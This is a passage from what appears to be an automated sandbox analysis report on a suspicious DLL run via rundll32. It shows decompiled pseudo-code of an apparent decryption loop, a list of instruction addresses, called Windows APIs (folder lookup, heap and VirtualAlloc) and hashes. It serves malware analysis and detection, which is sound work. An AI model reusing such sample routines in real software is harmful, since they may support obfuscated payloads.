				r11d = 0;
				r9d = r9d ^ _v904;
				_v912 = _t119;
				if (_t119 == 0) goto 0x800023b6;
				r8d = _t114 + 1;
				r8d = r8d & 0x00000003;
				 *(__r11 + _t103) =  *((intOrPtr*)(_t131 + 0x40 + _t134 * 4)) +  *((intOrPtr*)(_t131 + 0x40 + _t114 * 4)) ^  *(__r11 + _t124);
				asm("ror eax, cl");
				 *((intOrPtr*)(_t131 + 0x40 + _t114 * 4)) =  *((intOrPtr*)(_t131 + 0x40 + _t114 * 4)) + 1;
				asm("ror eax, cl");
				 *((intOrPtr*)(_t131 + 0x40 + _t134 * 4)) =  *((intOrPtr*)(_t131 + 0x40 + _t134 * 4)) + 1;
				_t108 = _v928;
				if (__r11 + 1 - _v920 >= 0) goto 0x800023b1;
				goto 0x80002354;
				_t120 = _v912;
				if (_t120 == 0) goto 0x800023d0;
				asm("rol ecx, 0x3");
				if (_t114 + 1 - _t120 < 0) goto 0x800023bf;
				if (r9d == 0 + ( *(_t114 + _t108) & 0x000000ff)) goto 0x80002415;
				if (r10d == 0) goto 0x800023f3;
				if (_t108 == 0) goto 0x800023f3;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				return 0x4000000;
			}

























      0x180002268
      0x180002268
      0x18000226b
      0x18000226f
      0x180002273
      0x180002277
      0x180002283
      0x18000228a
      0x180002293
      0x18000229a
      0x18000229f
      0x1800022a5
      0x1800022a9
      0x1800022ad
      0x1800022b2
      0x1800022ba
      0x1800022c2
      0x1800022c4
      0x1800022cd
      0x1800022d0
      0x1800022d5
      0x1800022df
      0x1800022e4
      0x1800022ea
      0x1800022f4
      0x1800022fa
      0x1800022fe
      0x180002306
      0x18000230b
      0x180002311
      0x18000231a
      0x180002321
      0x180002327
      0x180002332
      0x180002338
      0x18000233e
      0x180002342
      0x180002345
      0x18000234a
      0x180002352
      0x180002358
      0x18000235f
      0x180002375
      0x180002383
      0x180002387
      0x180002395
      0x180002399
      0x18000239e
      0x1800023a8
      0x1800023af
      0x1800023b1
      0x1800023bd
      0x1800023c8
      0x1800023ce
      0x1800023d3
      0x1800023d8
      0x1800023dd
      0x1800023df
      0x1800023ed
      0x180002414

      APIs
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
        • Part of subcall function 0000000180001F2C: SHGetFolderPathA.SHELL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F79
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F8D
        • Part of subcall function 0000000180001F2C: lstrcatA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FA8
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FD4
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FEE
      • GetProcessHeap.KERNEL32 ref: 0000000180002311
      • HeapAlloc.KERNEL32 ref: 0000000180002321
      • GetProcessHeap.KERNEL32 ref: 00000001800023DF
      • HeapFree.KERNEL32 ref: 00000001800023ED
        • Part of subcall function 0000000180002B5C: VirtualAlloc.KERNEL32 ref: 0000000180002B85
        • Part of subcall function 0000000180002B5C: GetLastError.KERNEL32 ref: 0000000180002B95
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heaplstrcpy$AllocProcess$ErrorFolderFreeLastPathVirtuallstrcat
      • String ID:
      • API String ID: 2105669568-0
      • Opcode ID: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
      • Instruction ID: 886363a85c85b8c133f3364473ad3588f921292bdc20cd3c907036740f45d7b5
      • Opcode Fuzzy Hash: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
      • Instruction Fuzzy Hash: 3351D172614B8486EA96CF14E10479DB3A1F78CBC4F188221EB9957B88DF39D74AC700
      Uniqueness

      Uniqueness Score: -1.00%